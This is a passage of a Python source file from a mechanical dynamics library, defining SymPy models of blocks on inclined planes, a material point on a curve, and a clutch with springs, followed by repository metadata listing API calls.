qs=self.qs)\n \n components['material_point'] = self.material_point\n components['spring'] = self.spring\n \n return components\n \n def symbols_description(self):\n self.sym_desc_dict = {\n self.m: r'mass of system on the spring',\n self.k: r'Spring coefficient ',\n }\n\n return self.sym_desc_dict\n\n\nclass LagrangeIBlocksOnInclinedPlane(ComposedSystem):\n scheme_name = 'ddof_disks_3_springs_scheme.png'\n real_name = 'nonlin_trolley_real.PNG'\n\n def __init__(self,\n m=Symbol('m', positive=True),\n m1=Symbol('m_1', positive=True),\n m2=Symbol('m_2', positive=True),\n m3=Symbol('m_3', positive=True),\n m4=Symbol('m_4', positive=True),\n R=Symbol('R', positive=True),\n g=Symbol('g', positive=True),\n alpha=Symbol('alpha',positive=True),\n beta=Symbol('beta',positive=True),\n ivar=Symbol('t'),\n x1=dynamicsymbols('x_1'),\n x2=dynamicsymbols('x_2'),\n x3=dynamicsymbols('x_3'),\n x4=dynamicsymbols('x_4'),\n phi=dynamicsymbols('\\\\varphi'),\n qs=dynamicsymbols('x_1, x_2, x_3, x_4, \\\\varphi'),\n **kwargs):\n\n self.m = m\n self.m1 = m1\n self.m2 = m2\n self.m3 = m3\n self.m4 = m\n self.R = R\n self.g = g\n self.alpha = alpha\n self.beta = beta\n self.x1 = x1\n self.x2 = x2\n self.x3 = x3\n self.x4 = x4\n self.phi = phi\n self.qs = qs\n\n\n #IMROVE\n self._init_from_components(**kwargs)\n \n @property\n def components(self):\n\n ######## ELEMENTS MOVED FROM __init__ METHOD\n self.Mass1 = MaterialPoint(self.m1, pos1=self.x1, qs=[self.x1]) + GravitationalForce(self.m1, self.g, pos1=-self.x1*sin(self.alpha), qs=[self.x1])\n self.Mass2 = MaterialPoint(self.m2, pos1=self.x2, qs=[self.x2]) + GravitationalForce(self.m2, self.g, pos1=-self.x2*sin(self.alpha), qs=[self.x2])\n self.Mass3 = MaterialPoint(self.m3, pos1=self.x3, qs=[self.x3]) + GravitationalForce(self.m3, self.g, pos1=-self.x3*sin(self.beta), qs=[self.x3])\n self.Mass4 = MaterialPoint(self.m4, pos1=self.x4, qs=[self.x4]) + GravitationalForce(self.m4, self.g, pos1=-self.x4*sin(self.beta), qs=[self.x4])\n self.Pulley = MaterialPoint(1/2*self.m*self.R**2, pos1=self.phi, qs=[self.phi])\n\n ####################\n\n components = {}\n\n components['Mass1'] = self.Mass1\n components['Mass2'] = self.Mass2\n components['Mass3'] = self.Mass3\n components['Mass4'] = self.Mass4\n components['Pulley'] = self.Pulley\n \n return components\n \n def get_default_data(self):\n\n m0 = symbols('m_0', positive=True)\n\n default_data_dict = {\n self.m: [S.Half * m0, 1 * m0, 2 * m0, 4 * m0, S.Half**2 * m0],\n self.m1: [S.Half * m0, 1 * m0, 2 * m0, 4 * m0, S.Half**2 * m0],\n self.m2: [S.Half * m0, 1 * m0, 2 * m0, 4 * m0, S.Half**2 * m0],\n self.m3: [S.Half * m0, 1 * m0, 2 * m0, 4 * m0, S.Half**2 * m0],\n self.m4: [S.Half * m0, 1 * m0, 2 * m0, 4 * m0, S.Half**2 * m0],\n }\n\n return default_data_dict\n\n def get_random_parameters(self):\n\n default_data_dict = self.get_default_data()\n\n parameters_dict = {\n key: random.choice(items_list)\n for key, items_list in default_data_dict.items()\n }\n\n return parameters_dict\n\n \n#TODO 159\nclass LagrangeIOnMathFunction(ComposedSystem):\n\n scheme_name = 'mat_point_parabola.PNG'\n real_name = 'tautochrone_curve_small.gif'\n\n \n \n \n def __init__(self,\n m=Symbol('m', positive=True),\n g=Symbol('g', positive=True),\n x=dynamicsymbols('x'),\n y=dynamicsymbols('y'),\n a=symbols('a',positive=True),\n R=symbols('R',positive=True),\n ivar=Symbol('t'),\n qs=dynamicsymbols('x,y'),\n **kwargs):\n\n self.m = m\n self.x = x\n self.y = y\n self.a = a\n self.R = R\n self.g = g\n\n system = HarmonicOscillator(S.Half*m*x.diff(ivar)**2+S.Half*m*y.diff(ivar)**2-m*g*y,qs=[x,y])\n\n super().__init__(system(qs),**kwargs)\n\n def get_default_data(self):\n\n\n m0 = symbols('m_0', positive=True)\n x = self.x\n a, Omega = symbols('a, Omega', positive=True)\n\n default_data_dict = {\n self.m :[S.Half * m0, 1 * m0, 2 * m0, 2**2 * m0, S.Half**2 * m0,8*m0,S.Half**3],\n self.y:[ a*x**2, a*(1-cos(x)),a*sin(x)**2,a*sin(x)**4,a*x**4]\n\n }\n\n return default_data_dict\n \n\n\n\n\n#Old MaterialPointMovement system, new system implemented.\n#This class is left just for an example.\nclass ExemplaryOldImplementedSystem(ComposedSystem):\n\n m = Symbol('m', positive=True)\n g = Symbol('g', positive=True)\n c = Symbol('c', positive=True)\n r = Symbol('r', positive=True)\n phi = dynamicsymbols('\\\\varphi')\n\n c0 = Symbol('c0', positive=True)\n r0 = Symbol('r0', positive=True)\n phi0 = dynamicsymbols('phi0')\n\n def __init__(self,\n m=None,\n g=None,\n c=None,\n r=None,\n phi=None,\n ivar=Symbol('t'),\n **kwargs):\n\n if m is not None: self.m = m\n if g is not None: self.g = g\n if c is not None: self.c = c\n if r is not None: self.r = r\n if phi is not None: self.phi = phi\n self.ivar = ivar\n\n self.qs = [self.phi]\n\n self._mass_x = MaterialPoint(self.m,\n pos1=self.r * sin(self.phi),\n qs=self.qs)\n self._mass_y = MaterialPoint(self.m,\n pos1=self.r * cos(self.phi),\n qs=self.qs)\n\n self._gravity_ = GravitationalForce(self.m,\n self.g,\n pos1=self.r * cos(self.phi),\n qs=self.qs)\n\n composed_system = self._mass_x + self._mass_y + self._gravity_\n\n super().__init__(composed_system, **kwargs)\n\n def symbols_description(self):\n self.sym_desc_dict = {\n self.m: r'Mass',\n self.g: r'Gravity constant',\n self.c: r'',\n }\n\n return self.sym_desc_dict\n\n def get_default_data(self):\n\n m0, c0, r0, phi0 = self.m0, self.c0, self.r0, self.phi0\n\n default_data_dict = {\n self.m: [m0 * no for no in range(1, 8)],\n self.c: [c0 * no for no in range(1, 8)],\n self.r: [r0 * no for no in range(1, 8)],\n self.phi: [phi0 * no for no in range(1, 8)],\n }\n\n return default_data_dict\n \n def get_numerical_data(self):\n\n m0, c0, r0, phi0 = self.m0, self.c0, self.r0, self.phi0\n\n default_data_dict = {\n self.m: [m0 * no for no in range(1, 8)],\n self.c: [c0 * no for no in range(1, 8)],\n self.r: [r0 * no for no in range(1, 8)],\n self.phi: [phi0 * no for no in range(1, 8)],\n }\n\n return default_data_dict\n\n def max_static_force(self):\n return S.Zero\n\n def max_dynamic_force(self):\n return S.Zero\n\n#DONE \nclass MaterialPointMovement(ComposedSystem):\n\n m = Symbol('m', positive=True)\n g = Symbol('g', positive=True)\n c = Symbol('c', positive=True)\n r = Symbol('r', positive=True)\n phi = dynamicsymbols('phi')\n\n c0 = Symbol('c0', positive=True)\n r0 = Symbol('r0', positive=True)\n phi0 = dynamicsymbols('phi0')\n\n def __init__(self,\n m=None,\n g=None,\n c=None,\n r=None,\n phi=None,\n ivar=Symbol('t'),\n **kwargs):\n\n if m is not None: self.m = m\n if g is not None: self.g = g\n if c is not None: self.c = c\n if r is not None: self.r = r\n if phi is not None: self.phi = phi\n self.ivar = ivar\n\n self.qs = [self.phi]\n\n self._init_from_components(**kwargs)\n\n @property\n def components(self):\n\n components = {}\n\n\n self._mass_x = MaterialPoint(self.m,\n pos1=self.r * sin(self.phi),\n qs=self.qs)\n self._mass_y = MaterialPoint(self.m,\n pos1=self.r * cos(self.phi),\n qs=self.qs)\n\n self._gravity = GravitationalForce(self.m,\n self.g,\n pos1=self.r * cos(self.phi),\n qs=self.qs)\n\n\n\n components['_mass_x']=self._mass_x\n components['_mass_y']=self._mass_y\n components['_gravity']=self._gravity\n\n\n return components\n \n def symbols_description(self):\n self.sym_desc_dict = {\n self.m: r'Mass',\n self.g: r'Gravity constant',\n self.c: r'',\n }\n\n return self.sym_desc_dict\n\n def get_default_data(self):\n\n m0, c0, r0, phi0 = self.m0, self.c0, self.r0, self.phi0\n\n default_data_dict = {\n self.m: [m0 * no for no in range(1, 8)],\n self.c: [c0 * no for no in range(1, 8)],\n self.r: [r0 * no for no in range(1, 8)],\n self.phi: [phi0 * no for no in range(1, 8)],\n }\n\n return default_data_dict\n \n def get_numerical_data(self):\n\n m0, c0, r0, phi0 = self.m0, self.c0, self.r0, self.phi0\n\n default_data_dict = {\n self.m: [m0 * no for no in range(1, 8)],\n self.c: [c0 * no for no in range(1, 8)],\n self.r: [r0 * no for no in range(1, 8)],\n self.phi: [phi0 * no for no in range(1, 8)],\n }\n\n return default_data_dict \n\n def max_static_force(self):\n return S.Zero\n\n def max_dynamic_force(self):\n return S.Zero\n\n \n#Kuba #poprawione \n\nclass KinematicClutchWithSprings(ComposedSystem):\n #scheme_name = ''\n #real_name = ''\n #detail_scheme_name = ''\n #detail_real_name = ''\n\n l0 = Symbol('l_0', positive=True)\n G = Symbol('G', positive=True)\n I = Symbol('I', positive=True)\n l_1 = Symbol('l_1', positive=True)\n l_2 = Symbol('l_2', positive=True)\n I_1 = Symbol('I_1', positive=True)\n I_2 = Symbol('I_2', positive=True)\n Ms = Symbol('M_s', positive=True)\n Omega = Symbol('Omega', positive=True)\n ivar=Symbol('t')\n theta = dynamicsymbols('theta')\n phi = dynamicsymbols('\\\\varphi')\n\n def __init__(self,\n l0=None,\n G=None,\n I=None,\n l_1=None,\n l_2=None,\n I_1=None,\n I_2=None,\n Ms=None,\n phi=None,\n theta=None,\n ivar=Symbol('t'),\n qs=None,\n **kwargs):\n \n if G is not None: self.G = G\n if I is not None: self.I = I\n if Ms is not None: self.Ms = Ms\n if l_1 is not None: self.l_1 = l_1\n if l_2 is not None: self.l_2 = l_2\n if I_1 is not None: self.I_1 = I_1\n if I_2 is not None: self.I_2 = I_2\n if phi is not None: self.phi = phi\n if theta is not None: self.theta = theta\n\n self.qs = [self.phi]\n self.ivar = ivar\n self._init_from_components(**kwargs)\n \n @cached_property\n def components(self):\n components = {}\n \n self.k_1 = (self.G * self.I_1) / self.l_1\n self.k_2 = (self.G * self.I_2) / self.l_2\n\n self.disc_1 = Disk(self.I, pos1=self.phi, qs=self.qs)\n self.spring_2 = Spring(self.k_1 * self.k_2 / (self.k_2 + self.k_1),\n pos1=self.phi,\n pos2=self.theta,\n qs=self.qs) #right spring\n self.moment = Force(self.Ms, pos1=self.phi, qs=self.qs)\n \n components['moment'] = self.moment\n components['disc_1'] = self.disc_1\n components['spring_2'] = self.spring_2\n \n return components\n\n\n def symbols_description(self):\n self.sym_desc_dict = {\n self.I: r'Moment of Inertia',\n self.k_1: r'',\n self.k_2: r'',\n }\n return self.sym_desc_dict\n def get_default_data(self):\n\n m0, l0, G, l = symbols('m_0 l_0 G l', positive=True)\n theta0, Omega = symbols('theta_0, Omega', positive=True)\n\n default_data_dict = {\n self.I: [S.Half * m0 * (l0**2) * no for no in range(1, 3)],\n self.I_1: [S.Half**(no) * (l0**4) for no in range(1, 8)],\n self.I_2: [S.Half**no * (l0**4) for no in range(1, 8)],\n self.l_1: [S.Half**(no - 6) * l0 for no in range(1, 8)],\n self.l_2: [S.Half**(no - 6) * l0 for no in range(1, 8)],\n self.theta: [theta0 * cos(Omega * self.ivar)],\n }\n\n return default_data_dict\n\n def disc_force(self):\n t = self.ivar\n return self.I * self.steady_solution().diff(t, t)\n\n def max_static_force_pin(self):\n d = Symbol('d', positive=True)\n return 2 * self.Ms / d\n\n def max_dynamic_force_pin(self):\n d = Symbol('d', positive=True)\n return self.frequency_response_function(\n self.natural_frequencies()[0]) * self.stiffness_matrix()[0]\n\n def max_static_bearing_force(self):\n d = Symbol('d', positive=True)\n return abs(2 * self.static_load()[0] / d)\n\n def max_dynamic_bearing_force(self):\n d = Symbol('d', positive=True)\n acc_amp = self.frequency_response_function() * self.Omega**2\n\n return abs(\n 2 * (self.I * acc_amp) /\n d) + self.max_static_bearing_force() #.subs(self._given_data)\n\n def static_key_length(self):\n kd = Symbol('k_d', positive=True)\n h = Symbol('h', positive=True)\n return (2 * self.max_static_bearing_force()) / (kd * h)\n\n def dynamic_key_length(self):\n\n kd = Symbol('k_d', positive=True)\n h = Symbol('h', positive=True)\n return (2 * self.max_dynamic_bearing_force()) / (kd * h) ", "repo_name": "bogumilchilinski/dynpy", "sub_path": "models/mechanics/principles.py", "file_name": "principles.py", "file_ext": "py", "file_size_in_byte": 30086, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dynamics.mech_comp.TitlePageComponent", "line_number": 26, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 26, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.SchemeComponent", "line_number": 27, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 27, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.ExemplaryPictureComponent", "line_number": 28, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 28, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.KineticEnergyComponent", "line_number": 29, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 29, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.KineticEnergyDynPyCodeComponent", "line_number": 30, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 30, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.KineticEnergySymPyCodeComponent", "line_number": 31, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 31, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.PotentialEnergyComponent", "line_number": 32, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 32, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.PotentialEnergyDynPyCodeComponent", "line_number": 33, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 33, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.PotentialEnergySymPyCodeComponent", "line_number": 34, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 34, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.LagrangianComponent", "line_number": 35, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 35, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.GoverningEquationComponent", "line_number": 36, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 36, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.GoverningEquationDynpyCodeComponent", "line_number": 37, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 37, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.GoverningEquationSympyCodeComponent", "line_number": 38, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 38, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.FundamentalMatrixComponent", "line_number": 39, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 39, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.GeneralSolutionComponent", "line_number": 40, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 40, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.GeneralSolutionDynpyCodeComponent", "line_number": 41, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 41, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.GeneralSolutionSympyCodeComponent", "line_number": 42, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 42, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.SteadySolutionComponent", "line_number": 43, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 43, "usage_type": "name"}, {"api_name": "dynamics.mech_comp.FreeVibrationFrequencyComponent", "line_number": 44, "usage_type": "attribute"}, {"api_name": "dynamics.mech_comp", "line_number": 44, "usage_type": "name"}, {"api_name": "dynamics.HarmonicOscillator", "line_number": 55, "usage_type": "name"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 69, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 71, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 72, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 73, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 74, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 75, "usage_type": "call"}, {"api_name": "dynamics.HarmonicOscillator", "line_number": 111, "usage_type": "argument"}, {"api_name": "elements.MaterialPoint", "line_number": 152, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 152, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 178, "usage_type": "call"}, {"api_name": "IPython.display.Image", "line_number": 181, "usage_type": "call"}, {"api_name": "IPython.display", "line_number": 181, "usage_type": "attribute"}, {"api_name": "base64.b64decode", "line_number": 181, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 243, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 257, "usage_type": "call"}, {"api_name": "dynamics.HarmonicOscillator", "line_number": 283, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 274, "usage_type": "name"}, {"api_name": "functools.lru_cache", "line_number": 279, "usage_type": "name"}, {"api_name": "sympy.Symbol", "line_number": 314, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 315, "usage_type": "call"}, {"api_name": "sympy.pi", "line_number": 316, "usage_type": "name"}, {"api_name": "sympy.Symbol", "line_number": 319, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 320, "usage_type": "call"}, {"api_name": "sympy.pi", "line_number": 321, "usage_type": "name"}, {"api_name": "sympy.Symbol", "line_number": 322, "usage_type": "call"}, {"api_name": "sympy.pi", "line_number": 323, "usage_type": "name"}, {"api_name": "sympy.Symbol", "line_number": 326, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 327, "usage_type": "call"}, {"api_name": "sympy.pi", "line_number": 328, "usage_type": "name"}, {"api_name": "utilities.adaptable.pd.Index", "line_number": 356, "usage_type": "call"}, {"api_name": "utilities.adaptable.pd", "line_number": 356, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 356, "usage_type": "call"}, {"api_name": "utilities.adaptable.NumericalAnalysisDataFrame", "line_number": 358, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 379, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 380, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 389, "usage_type": "argument"}, {"api_name": "sympy.cos", "line_number": 389, "usage_type": "argument"}, {"api_name": "sympy.S", "line_number": 393, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 396, "usage_type": "call"}, {"api_name": "sympy.solveset", "line_number": 398, "usage_type": "call"}, {"api_name": "{'ODESystem': 'solvers.linear.ODESystem', 'NumericalAnalysisDataFrame': 'utilities.adaptable.NumericalAnalysisDataFrame', 'TimeDataFrame': 'utilities.adaptable.TimeDataFrame', 'pd': 'utilities.adaptable.pd'}", "line_number": 413, "usage_type": "call"}, {"api_name": "{'ODESystem': 'solvers.linear.ODESystem', 'NumericalAnalysisDataFrame': 'utilities.adaptable.NumericalAnalysisDataFrame', 'TimeDataFrame': 'utilities.adaptable.TimeDataFrame', 'pd': 'utilities.adaptable.pd'}", "line_number": 422, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 470, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 471, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 472, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 474, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 500, "usage_type": "call"}, {"api_name": "elements.Spring", "line_number": 501, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 522, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 523, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 524, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 525, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 526, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 527, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 528, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 529, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 530, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 531, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 532, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 533, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 534, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 535, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 536, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 537, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 564, "usage_type": "call"}, {"api_name": "elements.GravitationalForce", "line_number": 564, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 564, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 565, "usage_type": "call"}, {"api_name": "elements.GravitationalForce", "line_number": 565, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 565, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 566, "usage_type": "call"}, {"api_name": "elements.GravitationalForce", "line_number": 566, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 566, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 567, "usage_type": "call"}, {"api_name": "elements.GravitationalForce", "line_number": 567, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 567, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 568, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 584, "usage_type": "call"}, {"api_name": "sympy.S.Half", "line_number": 587, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 587, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 588, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 588, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 589, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 589, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 590, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 590, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 591, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 591, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 601, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 618, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 619, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 620, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 621, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 622, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 623, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 624, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 625, "usage_type": "call"}, {"api_name": "dynamics.HarmonicOscillator", "line_number": 635, "usage_type": "call"}, {"api_name": "sympy.S.Half", "line_number": 635, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 635, "usage_type": "name"}, {"api_name": "sympy.symbols", "line_number": 642, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 644, "usage_type": "call"}, {"api_name": "sympy.S.Half", "line_number": 647, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 647, "usage_type": "name"}, {"api_name": "sympy.cos", "line_number": 648, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 648, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 662, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 663, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 664, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 665, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 666, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 668, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 669, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 670, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 678, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 690, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 691, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 693, "usage_type": "call"}, {"api_name": "sympy.cos", "line_number": 694, "usage_type": "call"}, {"api_name": "elements.GravitationalForce", "line_number": 697, "usage_type": "call"}, {"api_name": "sympy.cos", "line_number": 699, "usage_type": "call"}, {"api_name": "sympy.S.Zero", "line_number": 742, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 742, "usage_type": "name"}, {"api_name": "sympy.S.Zero", "line_number": 745, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 745, "usage_type": "name"}, {"api_name": "sympy.Symbol", "line_number": 750, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 751, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 752, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 753, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 754, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 756, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 757, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 758, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 766, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 786, "usage_type": "call"}, {"api_name": "sympy.sin", "line_number": 787, "usage_type": "call"}, {"api_name": "elements.MaterialPoint", "line_number": 789, "usage_type": "call"}, {"api_name": "sympy.cos", "line_number": 790, "usage_type": "call"}, {"api_name": "elements.GravitationalForce", "line_number": 793, "usage_type": "call"}, {"api_name": "sympy.cos", "line_number": 795, "usage_type": "call"}, {"api_name": "sympy.S.Zero", "line_number": 843, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 843, "usage_type": "name"}, {"api_name": "sympy.S.Zero", "line_number": 846, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 846, "usage_type": "name"}, {"api_name": "sympy.Symbol", "line_number": 857, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 858, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 859, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 860, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 861, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 862, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 863, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 864, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 865, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 866, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 867, "usage_type": "call"}, {"api_name": "sympy.physics.mechanics.dynamicsymbols", "line_number": 868, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 881, "usage_type": "call"}, {"api_name": "elements.Disk", "line_number": 906, "usage_type": "call"}, {"api_name": "elements.Spring", "line_number": 907, "usage_type": "call"}, {"api_name": "elements.Force", "line_number": 911, "usage_type": "call"}, {"api_name": "functools.cached_property", "line_number": 899, "usage_type": "name"}, {"api_name": "sympy.symbols", "line_number": 929, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 930, "usage_type": "call"}, {"api_name": "sympy.S.Half", "line_number": 933, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 933, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 934, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 934, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 935, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 935, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 936, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 936, "usage_type": "name"}, {"api_name": "sympy.S.Half", "line_number": 937, "usage_type": "attribute"}, {"api_name": "sympy.S", "line_number": 937, "usage_type": "name"}, {"api_name": "sympy.cos", "line_number": 938, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 948, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 952, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 957, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 961, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 969, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 970, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 975, "usage_type": "call"}, {"api_name": "sympy.Symbol", "line_number": 976, "usage_type": "call"}]}
